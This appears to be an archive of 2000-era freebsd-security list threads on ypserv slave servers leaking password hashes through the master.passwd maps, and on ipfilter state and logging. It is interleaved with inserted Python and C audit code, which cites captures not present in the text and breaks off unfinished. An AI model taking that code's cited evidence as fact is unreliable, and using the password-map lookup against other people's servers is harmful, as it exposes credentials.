> to execve behaviour which is generally dangerous, not whole exploit at
> once.

There is nothing wrong with the behavior of execve. Only a program
which was already insecure can be exploited through this technique.

-GAWollman


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12  9:14:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id 611B137B423 for ; Tue, 12 Sep 2000 09:14:13 -0700 (PDT)
Received: (qmail 32698 invoked from network); 12 Sep 2000 16:10:22 -0000
Received: from arsenic.theshell.com (HELO tequila) (root@63.236.138.5) by arsenic.theshell.com with SMTP; 12 Sep 2000 16:10:22 -0000
From: "Peter Avalos"
To: "Cy Schubert - ITSD Open Systems Group"
Cc: "freebsd-security@FreeBSD. ORG"
Subject: RE: ypserv giving out encrypted passwords
Date: Tue, 12 Sep 2000 11:12:46 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
In-Reply-To: <200009121453.e8CErva69663@cwsys.cwsent.com>
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is the way I want my server to work ;) I'm assuming that your ypserv is
a master. So my next questions are:

1. Does anyone who's running ypserv as a slave get the documented results?

2. Why is there a difference between a slave server and master server when
dealing with the master.passwd.* maps?


Your help is appreciated,

Peter Avalos
TheShell.com

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M-
V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++
------END GEEK CODE BLOCK------

-----Original Message-----
From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy Schubert - ITSD Open Systems Group
Sent: Tuesday, September 12, 2000 9:53 AM
To: Peter Avalos
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ypserv giving out encrypted passwords


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12  9:17:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id 282F537B42C for ; Tue, 12 Sep 2000 09:17:55 -0700 (PDT)
Received: (qmail 889 invoked from network); 12 Sep 2000 16:17:57 -0000
Received: from arsenic.theshell.com (HELO tequila) (root@63.236.138.5) by arsenic.theshell.com with SMTP; 12 Sep 2000 16:17:57 -0000
From: "Peter Avalos"
To: "David Wolfskill"
Cc: "freebsd-security@FreeBSD. ORG"
Subject: RE: ypserv giving out encrypted passwords
Date: Tue, 12 Sep 2000 11:20:22 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
In-Reply-To: <200009121503.IAA31586@pau-amma.whistle.com>
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

|I suspect that the "encrypted password only in master.passwd.by*" only
|works if it's a FreeBSD box as master. (A master constructs the maps; a
|slave merely repeats what it's told.)

Why? That just doesn't make sense to me. The master has to give the whole
map to the slave, and the slave server should still be acting as a server.
It shouldn't be dealing out the encrypted passwords to non-privileged ports.

It looks like the manpage is wrong (it looks at tcp and udp), but it also
looks like there's a bug when ypserv is acting as a slave server.

Regards,
Peter Avalos
TheShell.com


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12  9:32:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 6DFE337B422 for ; Tue, 12 Sep 2000 09:32:08 -0700 (PDT)
Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e8CGW6M22179; Tue, 12 Sep 2000 09:32:06 -0700 (PDT)
Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma022175; Tue, 12 Sep 2000 09:31:47 -0700
Received: (from dhw@localhost) by pau-amma.whistle.com (8.9.3/8.9.3) id JAA32038; Tue, 12 Sep 2000 09:31:47 -0700 (PDT) (envelope-from dhw)
Date: Tue, 12 Sep 2000 09:31:47 -0700 (PDT)
From: David Wolfskill
Message-Id: <200009121631.JAA32038@pau-amma.whistle.com>
To: dhw@whistle.com, pavalos@theshell.com
Subject: RE: ypserv giving out encrypted passwords
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>From: "Peter Avalos"
>Date: Tue, 12 Sep 2000 11:20:22 -0500

>|I suspect that the "encrypted password only in master.passwd.by*" only
>|works if it's a FreeBSD box as master. (A master constructs the maps; a
>|slave merely repeats what it's told.)

[I should note that the above parenthetical remark is speculation on my
part, to some extent, as I haven't reviewed the code in question. But
since such things as the "UNSECURE = 'TRUE'" specification go in the
/var/yp/Makefile on the *master*, it makes sense to me. dhw]

>Why? That just doesn't make sense to me. The master has to give the whole
>map to the slave, and the slave server should still be acting as a server.

The slave is acting as a server: in response to a client query, it
provides a copy or excerpt of the map it has. But it doesn't create the
map from scratch; it gets the maps from its master.

>It shouldn't be dealing out the encrypted passwords to non-privileged ports.

NIS doesn't really deal (much) in terms of what the fields are intended
to mean; it's basically a simple, moderately-distributed, name-value
lookup service. For example, if I request a lookup of "dhw" in the
"passwd.byname" map, what comes back is a "record". That the "record" is
broken up into separate fields is an artifact of what the client chooses
to do with the resulting information; NIS couldn't care less.

(The split-out of the password stuff is handled by the Makefile, so the
resulting maps get created with the proper contents, by the master server
during the "make" process. That has next to nothing to do with the NIS
client-server interaction.)

>It looks like the manpage is wrong (it looks at tcp and udp), but it also
>looks like there's a bug when ypserv is acting as a slave server.

That (latter) depends on the master server. It's likely that the man page
is (at least) confusing in such a case.
Cheers,
david
--
David Wolfskill          dhw@whistle.com          UNIX System Administrator
Desk: 650/577-7158       TIE: 8/499-7158          Cell: 650/759-0823


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12 10:23:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id B970637B424 for ; Tue, 12 Sep 2000 10:23:20 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA21972; Tue, 12 Sep 2000 10:22:43 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21967; Tue Sep 12 10:22:25 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA33350; Tue, 12 Sep 2000 10:22:25 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdi33348; Tue Sep 12 10:22:03 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8CHM3070153; Tue, 12 Sep 2000 10:22:03 -0700 (PDT)
Message-Id: <200009121722.e8CHM3070153@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdo70149; Tue Sep 12 10:22:02 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: "Peter Avalos"
Cc: "Cy Schubert - ITSD Open Systems Group" , "freebsd-security@FreeBSD. ORG"
Subject: Re: ypserv giving out encrypted passwords
In-reply-to: Your message of "Tue, 12 Sep 2000 11:12:46 CDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 12 Sep 2000 10:22:02 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , "Peter Avalos" writes:
> This is the way I want my server to work ;) I'm assuming that your ypserv is
> a master. So my next questions are:
>
> 1. Does anyone who's running ypserv as a slave get the documented results?
>
> 2. Why is there a difference between a slave server and master server when
> dealing with the master.passwd.* maps?
>
>
> Your help is appreciated,

My only YP installation is at home. Sorry, I have no slave. I don't
use YP at work.


Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC


>
> Peter Avalos
> TheShell.com
>
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M-
> V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++
> ------END GEEK CODE BLOCK------
>
> -----Original Message-----
> From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy
> Schubert - ITSD Open Systems Group
> Sent: Tuesday, September 12, 2000 9:53 AM
> To: Peter Avalos
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: ypserv giving out encrypted passwords
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12 11:32:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 7B99637B422 for ; Tue, 12 Sep 2000 11:32:50 -0700 (PDT)
Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id e8CIWdO05060; Tue, 12 Sep 2000 11:32:39 -0700
Date: Tue, 12 Sep 2000 11:32:39 -0700
From: Brooks Davis
To: Peter Avalos
Cc: David Wolfskill , "freebsd-security@FreeBSD. ORG"
Subject: Re: ypserv giving out encrypted passwords
Message-ID: <20000912113239.B31617@Odin.AC.HMC.Edu>
References: <200009121503.IAA31586@pau-amma.whistle.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: ; from pavalos@theshell.com on Tue, Sep 12, 2000 at 11:20:22AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Sep 12, 2000 at 11:20:22AM -0500, Peter Avalos wrote:
> Why? That just doesn't make sense to me. The master has to give the whole
> map to the slave, and the slave server should still be acting as a server.
> It shouldn't be dealing out the encrypted passwords to non-privileged ports.

You're mistaking NIS for an intelligent protocol. ;-) NIS does one thing
and one thing only. Given the name of a domain and the name of a map
within that name it returns one or more requested name-value pairs from
that map. It does nothing else and has no semantic knowledge of those
name-value pairs. FreeBSD appears to have a hack to implement shadow
passwd support, but it's definitely a non-standard hack. The security
model for NIS consists of two things: being able to connect to the server
and knowing the domain. That's it.

-- Brooks

--
Any statement of the form "X is the one, true Y" is FALSE.
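The privileged-port check that the ypserv(8) excerpt describes, and the tcpdump evidence traded in this thread, can be modelled in a few lines. The following is an added example (not code from the thread and not FreeBSD's ypserv): `may_serve` is the policy as a defender would want it, applied to UDP as well as TCP, and `audit_capture` pairs tcpdump one-liners of the kind pasted above into request/reply flows and flags a sizeable reply to an unprivileged client port. The 40-byte error-reply threshold, the "first packet of a flow is the request" pairing rule and the `stun-port` service mapping are assumptions taken from the captures quoted here.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

PRIVILEGED_PORT_MAX = 1023
PROTECTED_MAPS = {"master.passwd.byname", "master.passwd.byuid"}

# Assumption: the YP error reply seen in the thread was 32 bytes of UDP
# payload; a reply to a master.passwd.* lookup that is noticeably larger
# than that carries a record rather than an error.
YP_ERROR_REPLY_MAX = 40

# tcpdump prints service names instead of numbers when /etc/services has
# an entry; "stun-port 1994/udp" is the line quoted in the thread.
SERVICE_PORTS = {"stun-port": 1994}


def is_privileged_port(port: int) -> bool:
    """Only root can bind a port below 1024 on a Unix client."""
    return 0 < port <= PRIVILEGED_PORT_MAX


def may_serve(map_name: str, transport: str, client_port: int) -> bool:
    """Decide whether a ypserv-style server should answer this request.

    NIS has no access control beyond knowing the domain, so ordinary maps
    are always served. The master.passwd.* maps are only served to a client
    on a reserved port, and the check must apply to UDP as well as TCP
    because ypmatch/ypcat talk UDP.
    """
    if transport not in ("udp", "tcp"):
        raise ValueError("unknown transport: %s" % transport)
    if map_name not in PROTECTED_MAPS:
        return True
    return is_privileged_port(client_port)


# "07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92"
_TCPDUMP_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>.+?)\.(?P<sport>[\w-]+)\s+>\s+"
    r"(?P<dst>.+?)\.(?P<dport>[\w-]+):\s+(?P<proto>udp|tcp)\s+(?P<len>\d+)"
)


def _port(token: str) -> Optional[int]:
    """Resolve a numeric port or a known service name; None if unknown."""
    if token.isdigit():
        return int(token)
    return SERVICE_PORTS.get(token)


@dataclass
class Finding:
    client: str
    client_port: int
    server: str
    reply_len: int
    privileged: bool

    @property
    def suspicious(self) -> bool:
        """A sizeable reply to an unprivileged port suggests data was served."""
        return not self.privileged and self.reply_len > YP_ERROR_REPLY_MAX


def audit_capture(lines: List[str]) -> List[Finding]:
    """Pair request and reply datagrams; one Finding per answered request.

    The first packet seen for a flow is taken to be the request, so its
    destination is the server. Lines that do not parse are skipped.
    """
    pending: Set[Tuple[str, int, str, int]] = set()
    findings: List[Finding] = []
    for line in lines:
        m = _TCPDUMP_RE.match(line.strip())
        if not m:
            continue
        sport, dport = _port(m["sport"]), _port(m["dport"])
        if sport is None or dport is None:
            continue
        src, dst, length = m["src"], m["dst"], int(m["len"])
        reverse = (dst, dport, src, sport)     # (client, cport, server, sport)
        if reverse in pending:
            pending.discard(reverse)
            findings.append(Finding(client=dst, client_port=dport, server=src,
                                    reply_len=length,
                                    privileged=is_privileged_port(dport)))
        else:
            pending.add((src, sport, dst, dport))
    return findings


# Constructed sample: the three exchanges quoted in this thread.
SAMPLE_CAPTURE = [
    "07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92",          # non-root
    "07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32",          # error reply
    "07:43:06.646153 cwtest.657 > cwsys.1021: udp 92",           # root
    "07:43:06.647523 cwsys.1021 > cwtest.657: udp 128",          # record
    "06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88",
    "06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108",
]


def suspicious_clients(lines: List[str] = SAMPLE_CAPTURE) -> List[Tuple[str, int, int]]:
    """(client, client_port, reply_len) for every flow that looks like a leak."""
    return [(f.client, f.client_port, f.reply_len)
            for f in audit_capture(lines) if f.suspicious]


if __name__ == "__main__":
    for f in audit_capture(SAMPLE_CAPTURE):
        print(f, "SUSPICIOUS" if f.suspicious else "ok")
```

Run against the captures quoted in the thread, only the slave-server exchange (108-byte reply to port 1994) is flagged; Cy's master answered the unprivileged client with a 32-byte error.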
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12 17:48:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from minotaur.labyrinth.net.au (minotaur.labyrinth.net.au [203.9.148.2]) by hub.freebsd.org (Postfix) with ESMTP id 7396737B423 for ; Tue, 12 Sep 2000 17:48:24 -0700 (PDT)
Received: from cows (sean.lab.office.labyrinth.net.au [203.9.148.76]) by minotaur.labyrinth.net.au (8.9.3/8.9.3) with SMTP id LAA85678; Wed, 13 Sep 2000 11:48:05 +1100 (EST)
Message-ID: <009d01c01d1c$47795e40$4c9409cb@labyrinth.net.au>
From: "Sean Winn"
To: "Peter Avalos" , "Cy Schubert - ITSD Open Systems Group"
Cc: "freebsd-security@FreeBSD. ORG"
References:
Subject: Re: ypserv giving out encrypted passwords
Date: Wed, 13 Sep 2000 11:48:05 +1100
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

11:45 sean@sentinel [~] ypwhich
typhoon.sub.net.au
11:45 sean@sentinel [~] uname -a
FreeBSD sentinel.sub.net.au 3.4-STABLE FreeBSD 3.4-STABLE #0: Fri Jun  2 15:53:39 EST 2000     sean@sentinel.sub.net.au:/usr/src/sys/compile/SENTINEL  i386
11:45 sean@sentinel [~] ypmatch sean master.passwd
ypmatch: can't match key sean in map master.passwd.byname. reason: YP server error

11:45:46.981753 sentinel.sub.net.au.1318 > typhoon.sub.net.au.1021: udp 84
11:45:46.982734 typhoon.sub.net.au.1021 > sentinel.sub.net.au.1318: udp 32

typhoon is a slave server.

----- Original Message -----
From: "Peter Avalos"
To: "Cy Schubert - ITSD Open Systems Group"
Cc: "freebsd-security@FreeBSD. ORG"
Sent: Wednesday, September 13, 2000 3:12 AM
Subject: RE: ypserv giving out encrypted passwords


> This is the way I want my server to work ;) I'm assuming that your ypserv is
> a master. So my next questions are:
>
> 1. Does anyone who's running ypserv as a slave get the documented results?
>
> 2. Why is there a difference between a slave server and master server when
> dealing with the master.passwd.* maps?
>
>
> Your help is appreciated,
>
> Peter Avalos
> TheShell.com
>
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M-
> V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++
> ------END GEEK CODE BLOCK------
>
> -----Original Message-----
> From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy
> Schubert - ITSD Open Systems Group
> Sent: Tuesday, September 12, 2000 9:53 AM
> To: Peter Avalos
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: ypserv giving out encrypted passwords
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Wed Sep 13  2:17:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gera.nns.ru (gera.nns.ru [195.230.79.10]) by hub.freebsd.org (Postfix) with ESMTP id 8440A37B423 for ; Wed, 13 Sep 2000 02:17:39 -0700 (PDT)
Received: from falcon.nns.ru (falcon.nns.ru [195.230.79.70]) by gera.nns.ru (8.9.3/8.9.3) with ESMTP id NAA72059 for ; Wed, 13 Sep 2000 13:17:29 +0400 (MSD) (envelope-from abc@nns.ru)
Received: from localhost (localhost [127.0.0.1]) by falcon.nns.ru (8.9.3/8.9.3) with ESMTP id NAA00483 for ; Wed, 13 Sep 2000 13:17:29 +0400 (MSD) (envelope-from abc@nns.ru)
Date: Wed, 13 Sep 2000 13:17:29 +0400 (MSD)
From: "Andrey V. Sokolov"
To: freebsd-security@freebsd.org
Subject: ipf & keep state

Hello!

We have a router running under FreeBSD 4.1-RELEASE, with two ethernet
cards (ep0 and xl0). We have the WWW-server connected to the router
via xl0. The router is connected to the ISP via ep0. To let everyone visit
our WWW we have the following ipf rules for ep0:

...
block in log quick on ep0 all head 10
pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port = 80 flags S keep state group 10
...

But some types of packets are dropped by ipfilter within a legal session!

router# ipmon
...
13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 -> A.B.C.D,80 PR tcp len 20 10240 -AF IN
13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 -> A.B.C.D,80 PR tcp len 20 10240 -A IN
13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 -> A.B.C.D,80 PR tcp len 20 10240 -AFP IN
13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 -> A.B.C.D,80 PR tcp len 20 10240 -R IN
13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 -> A.B.C.D,80 PR tcp len 20 10240 -AF IN
...

Can anybody tell me how to fix it?

IMHO, ipfilter treats the session as finished after passing the first
FIN+ACK packet in the session, and forgets to pass the corresponding ACK
and FIN+ACK packets for a correct finish of the session.

Thanks.
Andrey.

From: Darren Reed
Message-Id: <200009131015.VAA15136@cairo.anu.edu.au>
Subject: Re: ipf & keep state
To: abc@nns.ru (Andrey V. Sokolov)
Date: Wed, 13 Sep 2000 21:15:37 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG

In some mail from Andrey V. Sokolov, sie said:
>
> Hello!
> We have router running under FreeBSD 4.1-RELEASE, with two ethernet
> cards (ep0 and xl0). We have the WWW-server connected to the router
> via xl0. The router connected to ISP via ep0. To let everyone visit
> our WWW we have following ipf rules for ep0:
> ...
> block in log quick on ep0 all head 10
> pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port
> = 80 flags S keep state group 10
> ...
>
> But some type of packets are dropped by ipfilter within legal session!
>
> router# ipmon
> ...
> 13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 ->
> A.B.C.D,80 PR tcp len 20 10240 -AF IN
> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 ->
> A.B.C.D,80 PR tcp len 20 10240 -A IN
> 13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 ->
> A.B.C.D,80 PR tcp len 20 10240 -AFP IN
> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 ->
> A.B.C.D,80 PR tcp len 20 10240 -R IN
> 13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 ->
> A.B.C.D,80 PR tcp len 20 10240 -AF IN
> ...
>
> Can anybody tell me how to fix it?
>
> IMHO, ipfilter treats the session as finished after passing first
> FIN+ACK packet in the session, and forgets to pass corresponding ACK
> and FIN+ACK packets for correct finish of the session.

More than likely it has received an RST from the web server too.
You can try adjusting the timeouts using sysctl.

Darren

Date: Wed, 13 Sep 2000 17:01:23 +0400 (MSD)
From: "Andrey V. Sokolov"
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipf & keep state
In-Reply-To: <200009131015.VAA15136@cairo.anu.edu.au>

On Wed, 13 Sep 2000, Darren Reed wrote:

>In some mail from Andrey V. Sokolov, sie said:
>>
>> Hello!
>> We have router running under FreeBSD 4.1-RELEASE, with two ethernet
>> cards (ep0 and xl0). We have the WWW-server connected to the router
>> via xl0. The router connected to ISP via ep0. To let everyone visit
>> our WWW we have following ipf rules for ep0:
>> ...
>> block in log quick on ep0 all head 10
>> pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port
>> = 80 flags S keep state group 10
>> ...
>>
>> But some type of packets are dropped by ipfilter within legal session!
>>
>> router# ipmon
>> ...
>> 13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 ->
>> A.B.C.D,80 PR tcp len 20 10240 -AF IN
>> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 ->
>> A.B.C.D,80 PR tcp len 20 10240 -A IN
>> 13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 ->
>> A.B.C.D,80 PR tcp len 20 10240 -AFP IN
>> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 ->
>> A.B.C.D,80 PR tcp len 20 10240 -R IN
>> 13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 ->
>> A.B.C.D,80 PR tcp len 20 10240 -AF IN
>> ...
>>
>> Can anybody tell me how to fix it?
>>
>> IMHO, ipfilter treats the session as finished after passing first
>> FIN+ACK packet in the session, and forgets to pass corresponding ACK
>> and FIN+ACK packets for correct finish of the session.
>
>More than likely it has received an RST from the web server too.
>You can try adjusting the timeouts using sysctl.
>
>Darren
>

Thanks for your answer!

You are right, ipfilter is receiving lots of RST from my www server.
We increased the marked parameter from 1 to 10. The number of RST packets
from the www dropped by ipfilter became smaller, but the number of dropped
FIN+ACK packets from any to the www is still great. Maybe we can try to
change some other parameters?

net.inet.ipf.fr_flags: 0
net.inet.ipf.fr_pass: 514
net.inet.ipf.fr_active: 0
net.inet.ipf.fr_tcpidletimeout: 864000
net.inet.ipf.fr_tcpclosewait: 480
net.inet.ipf.fr_tcplastack: 480
net.inet.ipf.fr_tcptimeout: 480
net.inet.ipf.fr_tcpclosed: 10
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
net.inet.ipf.fr_udptimeout: 240
net.inet.ipf.fr_icmptimeout: 120
net.inet.ipf.fr_defnatage: 1200
net.inet.ipf.fr_ipfrttl: 120
net.inet.ipf.ipl_unreach: 13
net.inet.ipf.fr_running: 1
net.inet.ipf.fr_authsize: 32
net.inet.ipf.fr_authused: 0
net.inet.ipf.fr_defaultauthage: 600

--
Andrey.

Message-ID: <39BF49B9.F5EAFC19@allmaui.com>
Date: Wed, 13 Sep 2000 09:32:41 +0000
From: Craig Cowen
To: "freebsd-security@FreeBSD.ORG"
Subject: ipf logging

I am not clear on how to log ipf.
I believe I need to edit my syslog.conf.
Can someone please explain.

TIA,
Craig

Date: Wed, 13 Sep 2000 14:17:05 -0300 (ART)
From: Fernando Gleiser
To: Craig Cowen
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: ipf logging
In-Reply-To: <39BF49B9.F5EAFC19@allmaui.com>

On Wed, 13 Sep 2000, Craig Cowen wrote:

> I am not clear on how to log ipf.
> I believe I need to edit my syslog.conf.

Yes and no. ipmon (ipf's logging process) can log via syslog or directly
to a file.

If you want to log to a file:

# ipmon &

If you want to use syslog:

# ipmon -s &

and you have to add a line like this to syslog.conf:

local0.*        /var/log/ipf.log

> Can someone please explain.

Hope this helps

Fer

> TIA,
> Craig
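Once ipmon output is landing in a file, the question from the "ipf & keep state" thread above (are the blocked packets leftovers of connections that were already closing, or genuinely unsolicited traffic?) can be answered by sorting the block records by their TCP flags. The following is an added example, not code from either thread or from ipfilter: a small parser for ipmon lines in the layout quoted above and a tally over them. The log lines in it are constructed for the example (documentation-range addresses, made-up timestamps), and the ipmon field layout is assumed to be exactly the one shown in the thread.

```c
#include <stdio.h>
#include <string.h>

/* One ipmon(8) packet record, fields in the order the thread's output shows. */
struct ipmon_rec {
    char date[16], time[24], ifname[16], rule[16];
    char action;            /* 'b' = blocked, 'p' = passed */
    char src[64], dst[64];  /* "addr,port" as ipmon prints them */
    char proto[8];
    int  hlen, plen;
    char flags[16];         /* "-AF", "-R", "-S" ...; empty for non-TCP */
    char dir[8];            /* "IN" or "OUT" */
};

/* Parse one line. Returns 1 for a packet record, 0 for anything else
 * (the "router# ipmon" prompt, "..." continuation lines, blank lines). */
int parse_ipmon(const char *line, struct ipmon_rec *r)
{
    int consumed = 0, used = 0;
    char tok[16];
    const char *p;

    memset(r, 0, sizeof *r);
    if (sscanf(line, "%15s %23s %15s %15s %c %63s -> %63s PR %7s len %d %d%n",
               r->date, r->time, r->ifname, r->rule, &r->action,
               r->src, r->dst, r->proto, &r->hlen, &r->plen, &consumed) != 10)
        return 0;
    /* After "len a b" come an optional "-<flags>" word and the direction. */
    for (p = line + consumed; sscanf(p, "%15s%n", tok, &used) == 1; p += used) {
        if (tok[0] == '-')
            strncpy(r->flags, tok, sizeof r->flags - 1);
        else
            strncpy(r->dir, tok, sizeof r->dir - 1);
    }
    return 1;
}

struct tally {
    int blocked_total;
    int teardown;    /* FIN or RST present: tail of a connection whose state expired */
    int mid_stream;  /* ACK/PSH only: state entry gone (or never created) mid-flow */
    int new_syn;     /* bare SYN: an unsolicited connection attempt */
    int non_tcp;
};

/* Classify every blocked record seen on ifname. Returns the number of
 * lines that parsed as packet records at all. */
int tally_blocked(const char *const lines[], size_t n, const char *ifname,
                  struct tally *t)
{
    int parsed = 0;
    size_t i;
    memset(t, 0, sizeof *t);
    for (i = 0; i < n; i++) {
        struct ipmon_rec r;
        if (!parse_ipmon(lines[i], &r))
            continue;
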